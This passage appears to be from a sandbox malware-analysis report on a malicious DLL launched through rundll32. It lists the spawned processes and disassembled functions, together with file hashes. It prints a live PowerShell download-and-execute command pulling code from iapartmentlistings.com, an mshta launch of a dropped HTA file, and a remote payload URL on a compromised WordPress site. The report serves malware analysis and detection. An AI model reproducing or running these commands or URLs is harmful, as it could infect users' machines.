        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:18
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:20
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 424
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:22
        Start time:12:06:59
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
        Imagebase:0x9b0000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:23
        Start time:12:07:00
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        Imagebase:0x1b0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        General

        Target ID:24
        Start time:12:07:00
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Disassembly

        Reset < >

          Non-executed Functions

          Function 00007FF8BFAB15B0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: QueryVirtual
          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
          • API String ID: 1804819252-1534286854
          • Opcode ID: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
          • Instruction ID: a19c7c87764d8a415cfdd3cc6b3d82126227870ffbd1a835e177718184687d32
          • Opcode Fuzzy Hash: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
          • Instruction Fuzzy Hash: 0941BF71A08F0282EA089F99E4967B97BA4FF45BC8F446135DB0D07396EE3CE545C700
          Function 00007FF8BFAB13A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 17COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: ExecuteShell
          • String ID: c:\users\public\example.hta$https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt$mshta$open
          • API String ID: 587946157-3291801218
          • Opcode ID: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
          • Instruction ID: a3f768f18aad5c50f54649dae7d2368e406bb32b920232e3afd06afc5e355ae7
          • Opcode Fuzzy Hash: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
          • Instruction Fuzzy Hash: 86E0C97190CE4691EB189F98F8563E53764FB4838CF80613ADA4E42666DF7C9209C744
          Function 00007FF8BFAB1010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: Sleep_amsg_exit
          • String ID:
          • API String ID: 1015461914-0
          • Opcode ID: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
          • Instruction ID: e14187f9e0ac11e69900e7c81f42332d16f82d9e2110220663b543287c4cc9f3
          • Opcode Fuzzy Hash: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
          • Instruction Fuzzy Hash: 0E417D32E09D4685F65A8B9EF85237927A9AF847DCF486436DF0C47392DE3DE8819300